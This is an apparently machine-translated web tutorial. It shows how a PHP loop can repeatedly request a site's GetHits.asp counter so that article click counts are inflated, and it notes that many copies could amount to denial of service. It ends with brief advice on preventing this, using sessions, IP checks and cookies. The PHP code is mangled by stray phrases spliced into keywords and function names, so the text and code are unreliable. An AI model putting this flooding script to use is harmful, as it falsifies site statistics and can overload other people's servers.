I accidentally saw a website today. Its counter can be updated in a static page. I thought it should be done using js. When I opened the source code, it turned out to be:
<div align =center><SPAN class=Article_tdbgall>
Author: Unknown Article source: Meidi.Net
Number of clicks:
<script language='javascript' src='/Article/GetHits.asp?ArticleID=759 '></script>
Update time: 2005-5-27</SPAN>
</div>
The number of clicks is followed by an asp file for processing, then I open this file Take a look:
document.write('210');
Right, it is the GetHists.asp file that processes the ArticleID and extracts the results and then outputs the number of times: document.write('number of times'), It can be referenced directly in the static page.
Bad guys are bad guys after all, so I thought, how can I quickly increase the number of clicks? Manual refresh is not very useful. Well, quickly write a php (as the current mainstream development language) program to automatically access this file.
php(as the current mainstream development language)The code is as follows:
<?php(as the current mainstream development language)
/* access(favorite for small websites)_url.php(as the current mainstream development language) */
define(SUM, 1000); // Number of visits required
define(L_TIME, 1000); //Forcing script execution time
define(S_TIME, 1); //Sleep time between each visit
$url = "http: //www.xxx.com/Article/GetHits.asp?ArticleID=759"; //The address that needs to be accessed
set_time_limit(L_TIME);
//Access the specified URL function knowsky.com
function access(favorite for small websites)_url($url)
{
if ($url=='') return false;
$fp = fopen($url , 'r') or exit('Open url faild!');
if ($fp) {
while (!feof($fp)) {
$file = fgets($fp);
echo $file."
<p> </p>
";
}
unset($file);
}
}
//Test
for ($i=0; $i<SUM; $i++ ) {
access(favorite for small websites)_url($url);
sleep(S_TIME);
}
?>
Run the above program will continuously access the specified URL address, and naturally the number of visits will continue to increase, achieving the effect of flooding. If the traffic is large and multiple programs are used to run it, it will easily lead to denial of service ( DoS). If the other party takes preventive measures, modify the code and submit it to the forum.
Prevention method:
1. Use Session in the code. Mechanism, when the user submits, a Session ID is generated. When submitting the content, it is judged whether it has been submitted. If it has been submitted, brushing is not allowed.
2. When the user submits, the user's IP address is recorded, if specified. If you submit it again within the time, it will not be allowed.
3. After the user submits the content, a cookie is written on the user's client. If the user submits again, check whether there is a cookie on the client to determine whether the submission is allowed.
There are many other ways, you can search or use your imagination to do better.